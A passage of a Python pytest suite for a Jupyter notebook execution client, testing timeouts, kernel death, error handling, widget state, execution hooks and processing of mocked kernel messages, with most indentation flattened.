"""Check that an error is raised when a computation times out"""
filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
def timeout_func(source):
return 10
with pytest.raises(TimeoutError):
run_notebook(filename, dict(timeout_func=timeout_func), res)
    def test_kernel_death_after_timeout(self):
        """Check that an error is raised when the kernel is_alive is false after a cell timed out"""
        filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
        with open(filename) as f:
            input_nb = nbformat.read(f, 4)
        res = self.build_resources()
        res['metadata']['path'] = os.path.dirname(filename)
        executor = NotebookClient(input_nb, timeout=1)
        # First run merely times out; the kernel itself is still alive
        with pytest.raises(TimeoutError):
            executor.execute()
        km = executor.create_kernel_manager()

        # Simulate a dead kernel by forcing is_alive to report False
        async def is_alive():
            return False

        km.is_alive = is_alive
        # Will be a RuntimeError or subclass DeadKernelError depending
        # on if jupyter_client or nbconvert catches the dead client first
        with pytest.raises(RuntimeError):
            input_nb, output_nb = executor.execute()
def test_kernel_death_during_execution(self):
"""Check that an error is raised when the kernel is_alive is false during a cell
execution.
"""
filename = os.path.join(current_dir, 'files', 'Autokill.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
executor = NotebookClient(input_nb)
with pytest.raises(RuntimeError):
executor.execute()
def test_allow_errors(self):
"""
Check that conversion halts if ``allow_errors`` is False.
"""
filename = os.path.join(current_dir, 'files', 'Skip Exceptions.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
with pytest.raises(CellExecutionError) as exc:
run_notebook(filename, dict(allow_errors=False), res)
self.assertIsInstance(str(exc.value), str)
assert "# üñîçø∂é" in str(exc.value)
def test_force_raise_errors(self):
"""
Check that conversion halts if the ``force_raise_errors`` traitlet on
NotebookClient is set to True.
"""
filename = os.path.join(current_dir, 'files', 'Skip Exceptions with Cell Tags.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
with pytest.raises(CellExecutionError) as exc:
run_notebook(filename, dict(force_raise_errors=True), res)
self.assertIsInstance(str(exc.value), str)
assert "# üñîçø∂é" in str(exc.value)
def test_reset_kernel_client(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
executor = NotebookClient(
input_nb,
resources=self.build_resources(),
)
executor.execute(cleanup_kc=False)
# we didn't ask to reset the kernel client, a new one must have been created
kc = executor.kc
assert kc is not None
executor.execute(cleanup_kc=False)
# we didn't ask to reset the kernel client, the previously created one must have been reused
assert kc == executor.kc
executor.execute(reset_kc=True, cleanup_kc=False)
# we asked to reset the kernel client, the previous one must have been cleaned up,
# a new one must have been created
assert kc != executor.kc
def test_cleanup_kernel_client(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
executor = NotebookClient(
input_nb,
resources=self.build_resources(),
)
executor.execute()
# we asked to cleanup the kernel client (default is True)
assert executor.kc is None
executor.execute(cleanup_kc=False)
# we didn't ask to reset the kernel client
# a new one must have been created and should still be available
assert executor.kc is not None
def test_custom_kernel_manager(self):
from .fake_kernelmanager import FakeCustomKernelManager
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
cleaned_input_nb = copy.deepcopy(input_nb)
for cell in cleaned_input_nb.cells:
if 'execution_count' in cell:
del cell['execution_count']
cell['outputs'] = []
executor = NotebookClient(
cleaned_input_nb,
resources=self.build_resources(),
kernel_manager_class=FakeCustomKernelManager,
)
# Override terminal size to standardise traceback format
with modified_env({'COLUMNS': '80', 'LINES': '24'}):
executor.execute()
expected = FakeCustomKernelManager.expected_methods.items()
for method, call_count in expected:
self.assertNotEqual(call_count, 0, f'{method} was called')
def test_process_message_wrapper(self):
outputs: list = []
class WrappedPreProc(NotebookClient):
def process_message(self, msg, cell, cell_index):
result = super().process_message(msg, cell, cell_index)
if result:
outputs.append(result)
return result
current_dir = os.path.dirname(__file__)
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
original = copy.deepcopy(input_nb)
wpp = WrappedPreProc(input_nb)
executed = wpp.execute()
assert outputs == [{'name': 'stdout', 'output_type': 'stream', 'text': 'Hello World\n'}]
assert_notebooks_equal(original, executed)
def test_execute_function(self):
# Test the execute() convenience API
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
original = copy.deepcopy(input_nb)
executed = execute(original, os.path.dirname(filename))
assert_notebooks_equal(original, executed)
def test_widgets(self):
"""Runs a test notebook with widgets and checks the widget state is saved."""
input_file = os.path.join(current_dir, 'files', 'JupyterWidgets.ipynb')
opts = dict(kernel_name="python")
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(input_file)
input_nb, output_nb = run_notebook(input_file, opts, res)
output_data = [
output.get('data', {}) for cell in output_nb['cells'] for output in cell['outputs']
]
model_ids = [
data['application/vnd.jupyter.widget-view+json']['model_id']
for data in output_data
if 'application/vnd.jupyter.widget-view+json' in data
]
wdata = output_nb['metadata']['widgets']['application/vnd.jupyter.widget-state+json']
for k in model_ids:
d = wdata['state'][k]
assert 'model_name' in d
assert 'model_module' in d
assert 'state' in d
assert 'version_major' in wdata
assert 'version_minor' in wdata
def test_execution_hook(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [MagicMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute()
for hook in hooks[:3]:
hook.assert_called_once()
hooks[3].assert_not_called()
for hook in hooks[4:6]:
hook.assert_called_once()
hooks[6].assert_not_called()
def test_error_execution_hook_error(self):
filename = os.path.join(current_dir, 'files', 'Error.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [MagicMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with pytest.raises(CellExecutionError):
executor.execute()
for hook in hooks[:5]:
hook.assert_called_once()
hooks[6].assert_not_called()
def test_error_notebook_hook(self):
filename = os.path.join(current_dir, 'files', 'Autokill.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [MagicMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with pytest.raises(RuntimeError):
executor.execute()
for hook in hooks[:3]:
hook.assert_called_once()
hooks[3].assert_not_called()
for hook in hooks[4:]:
hook.assert_called_once()
def test_async_execution_hook(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [AsyncMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute()
for hook in hooks[:3]:
hook.assert_called_once()
hooks[3].assert_not_called()
for hook in hooks[4:6]:
hook.assert_called_once()
hooks[6].assert_not_called()
def test_error_async_execution_hook(self):
filename = os.path.join(current_dir, 'files', 'Error.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [AsyncMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with pytest.raises(CellExecutionError):
executor.execute().execute()
for hook in hooks[:5]:
hook.assert_called_once()
hooks[6].assert_not_called()
class TestRunCell(NBClientTestsBase):
"""Contains test functions for NotebookClient.execute_cell"""
@prepare_cell_mocks()
def test_idle_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# Just the exit message should be fetched
assert message_mock.call_count == 1
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'execute_reply'},
'parent_header': {'msg_id': 'wrong_parent'},
'content': {'name': 'stdout', 'text': 'foo'},
}
)
def test_message_for_wrong_parent(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An ignored stream followed by an idle
assert message_mock.call_count == 2
# Ensure no output was written
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'status',
'header': {'msg_type': 'status'},
'content': {'execution_state': 'busy'},
}
)
def test_busy_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# One busy message, followed by an idle
assert message_mock.call_count == 2
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_deadline_exec_reply(self, executor, cell_mock, message_mock):
# exec_reply is never received, so we expect to hit the timeout.
async def get_msg(timeout):
await asyncio.sleep(timeout)
raise Empty
executor.kc.shell_channel.get_msg = get_msg
executor.timeout = 1
with pytest.raises(TimeoutError):
executor.execute_cell(cell_mock, 0)
assert message_mock.call_count == 3
# Ensure the output was captured
self.assertListEqual(
cell_mock.outputs,
[
{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
],
)
@prepare_cell_mocks()
def test_deadline_iopub(self, executor, cell_mock, message_mock):
# The shell_channel will complete, so we expect only to hit the iopub timeout.
message_mock.side_effect = Empty()
executor.raise_on_iopub_timeout = True
with pytest.raises(TimeoutError):
executor.execute_cell(cell_mock, 0)
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_eventual_deadline_iopub(self, executor, cell_mock, message_mock):
# Process a few messages before raising a timeout from iopub
def message_seq(messages):
yield from messages
while True:
yield Empty()
message_mock.side_effect = message_seq(list(message_mock.side_effect)[:-1])
executor.kc.shell_channel.get_msg = Mock(
return_value=make_async({'parent_header': {'msg_id': executor.parent_id}})
)
executor.raise_on_iopub_timeout = True
with pytest.raises(TimeoutError):
executor.execute_cell(cell_mock, 0)
assert message_mock.call_count >= 3
# Ensure the output was captured
self.assertListEqual(
cell_mock.outputs,
[
{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
],
)
@prepare_cell_mocks(
{'msg_type': 'execute_input', 'header': {'msg_type': 'execute_input'}, 'content': {}}
)
def test_execute_input_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# One ignored execute_input, followed by an idle
assert message_mock.call_count == 2
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_stream_messages(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An stdout then stderr stream followed by an idle
assert message_mock.call_count == 3
# Ensure the output was captured
self.assertListEqual(
cell_mock.outputs,
[
{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
],
)
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'execute_reply'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{'msg_type': 'clear_output', 'header': {'msg_type': 'clear_output'}, 'content': {}},
)
def test_clear_output_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A stream, followed by a clear, and then an idle
assert message_mock.call_count == 3
# Ensure the output was cleared
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'clear_output',
'header': {'msg_type': 'clear_output'},
'content': {'wait': True},
},
)
def test_clear_output_wait_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A stream, followed by a clear, and then an idle
assert message_mock.call_count == 3
# Should be true without another message to trigger the clear
self.assertTrue(executor.clear_before_next_output)
# Ensure the output wasn't cleared yet
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'clear_output',
'header': {'msg_type': 'clear_output'},
'content': {'wait': True},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_clear_output_wait_then_message_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An stdout stream, followed by a wait clear, an stderr stream, and then an idle
assert message_mock.call_count == 4
# Should be false after the stderr message
assert not executor.clear_before_next_output
# Ensure the output wasn't cleared yet
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'}]
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'clear_output',
'header': {'msg_type': 'clear_output'},
'content': {'wait': True},
},
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
},
)
def test_clear_output_wait_then_update_display_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An stdout stream, followed by a wait clear, an stderr stream, and then an idle
assert message_mock.call_count == 4
# Should be false after the stderr message
assert executor.clear_before_next_output
# Ensure the output wasn't cleared yet because update_display doesn't add outputs
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]
@prepare_cell_mocks(
{
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
'content': {'execution_count': 42},
}
)
def test_execution_count_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execution count followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
'content': {'execution_count': 42},
}
)
def test_execution_count_message_ignored_on_override(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0, execution_count=21)
# An execution count followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 21
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'execution_count': 42, 'name': 'stdout', 'text': 'foo'},
}
)
def test_execution_count_with_stream_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execution count followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Should also consume the message stream
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'content': {'comm_id': 'foobar', 'data': {'state': {'foo': 'bar'}}},
}
)
def test_widget_comm_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A comm message without buffer info followed by an idle
assert message_mock.call_count == 2
self.assertEqual(executor.widget_state, {'foobar': {'foo': 'bar'}})
# Buffers should still be empty
assert not executor.widget_buffers
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'buffers': [b'123'],
'content': {
'comm_id': 'foobar',
'data': {'state': {'foo': 'bar'}, 'buffer_paths': [['path']]},
},
}
)
def test_widget_comm_buffer_message_single(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A comm message with buffer info followed by an idle
assert message_mock.call_count == 2
assert executor.widget_state == {'foobar': {'foo': 'bar'}}
assert executor.widget_buffers == {
'foobar': {('path',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path']}}
}
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'buffers': [b'123'],
'content': {
'comm_id': 'foobar',
'data': {'state': {'foo': 'bar'}, 'buffer_paths': [['path']]},
},
},
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'buffers': [b'123'],
'content': {
'comm_id': 'foobar',
'data': {'state': {'foo2': 'bar2'}, 'buffer_paths': [['path2']]},
},
},
)
def test_widget_comm_buffer_messages(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A comm message with buffer info followed by an idle
assert message_mock.call_count == 3
assert executor.widget_state == {'foobar': {'foo': 'bar', 'foo2': 'bar2'}}
assert executor.widget_buffers == {
'foobar': {
('path',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path']},
('path2',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path2']},
}
}
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'content': {
'comm_id': 'foobar',
# No 'state'
'data': {'foo': 'bar'},
},
}
)
def test_unknown_comm_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An unknown comm message followed by an idle
assert message_mock.call_count == 2
# Widget states should be empty as the message has the wrong shape
assert not executor.widget_state
assert not executor.widget_buffers
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'execute_result',
'header': {'msg_type': 'execute_result'},
'content': {
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
},
}
)
def test_execute_result_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execute followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'execute_result',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
}
]
# No display id was provided
assert not executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'execute_result',
'header': {'msg_type': 'execute_result'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
},
}
)
def test_execute_result_with_display_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execute followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'execute_result',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
}
)
def test_display_data_without_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an idle
assert message_mock.call_count == 2
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
}
]
# No display id was provided
assert not executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
},
}
)
def test_display_data_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an idle
assert message_mock.call_count == 2
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
},
},
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar_other'},
'metadata': {'metafoo_other': 'metabar_other'},
'data': {'foo': 'bar_other'},
},
},
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
)
def test_display_data_same_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an idle
assert message_mock.call_count == 4
# Original output should be manipulated and a copy of the second now
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
{
'output_type': 'display_data',
'metadata': {'metafoo_other': 'metabar_other'},
'data': {'foo': 'bar_other'},
},
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
}
)
def test_update_display_data_without_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An update followed by an idle
assert message_mock.call_count == 2
# Display updates don't create any outputs
assert cell_mock.outputs == []
# No display id was provided
assert not executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {
'transient': {'display_id': 'foobar2'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
)
def test_update_display_data_mismatch_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An update followed by an idle
assert message_mock.call_count == 3
# Display updates don't create any outputs
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
},
},
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
)
def test_update_display_data_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an update then an idle
assert message_mock.call_count == 3
# Original output should be manipulated
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
}
)
def test_error_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 2
# Should also consume the message stream
assert cell_mock.outputs == [
{'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}
]
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
},
)
def test_error_and_error_status_messages(self, executor, cell_mock, message_mock):
with self.assertRaises(CellExecutionError):
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 2
# Cell outputs should still be copied
assert cell_mock.outputs == [
{'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}
]
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# OK
'content': {'status': 'ok'},
},
)
def test_error_message_only(self, executor, cell_mock, message_mock):
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 2
# Should also consume the message stream
assert cell_mock.outputs == [
{'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}
]
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_allow_errors(self, executor, cell_mock, message_mock):
executor.allow_errors = True
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 1
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error', 'ename': 'NotImplementedError'},
}
)
def test_allow_error_names(self, executor, cell_mock, message_mock):
executor.allow_error_names = ['NotImplementedError']
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 1
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_raises_exception_tag(self, executor, cell_mock, message_mock):
cell_mock.metadata['tags'] = ['raises-exception']
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 1
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_non_code_cell(self, executor, cell_mock, message_mock):
cell_mock = NotebookNode(source='"foo" = "bar"', metadata={}, cell_type='raw', outputs=[])
# Should NOT raise nor execute any code
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 0
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_no_source(self, executor, cell_mock, message_mock):
cell_mock = NotebookNode(
# Stripped source is empty
source=' ',
metadata={},
cell_type='code',
outputs=[],
)
# Should NOT raise nor execute any code
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 0
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks()
def test_cell_hooks(self, executor, cell_mock, message_mock):
hooks = [MagicMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute_cell(cell_mock, 0)
for hook in hooks[:3]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[4:]:
hook.assert_not_called()
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
},
)
def test_error_cell_hooks(self, executor, cell_mock, message_mock):
hooks = [MagicMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with self.assertRaises(CellExecutionError):
executor.execute_cell(cell_mock, 0)
for hook in hooks[:4]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[5:]:
hook.assert_not_called()
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_non_code_cell_hooks(self, executor, cell_mock, message_mock):
cell_mock = NotebookNode(source='"foo" = "bar"', metadata={}, cell_type='raw', outputs=[])
hooks = [MagicMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute_cell(cell_mock, 0)
for hook in hooks[:1]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[1:]:
hook.assert_not_called()
@prepare_cell_mocks()
def test_async_cell_hooks(self, executor, cell_mock, message_mock):
hooks = [AsyncMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute_cell(cell_mock, 0)
for hook in hooks[:3]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[4:]:
hook.assert_not_called()
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
},
)
def test_error_async_cell_hooks(self, executor, cell_mock, message_mock):
hooks = [AsyncMock() for i in range(7)]
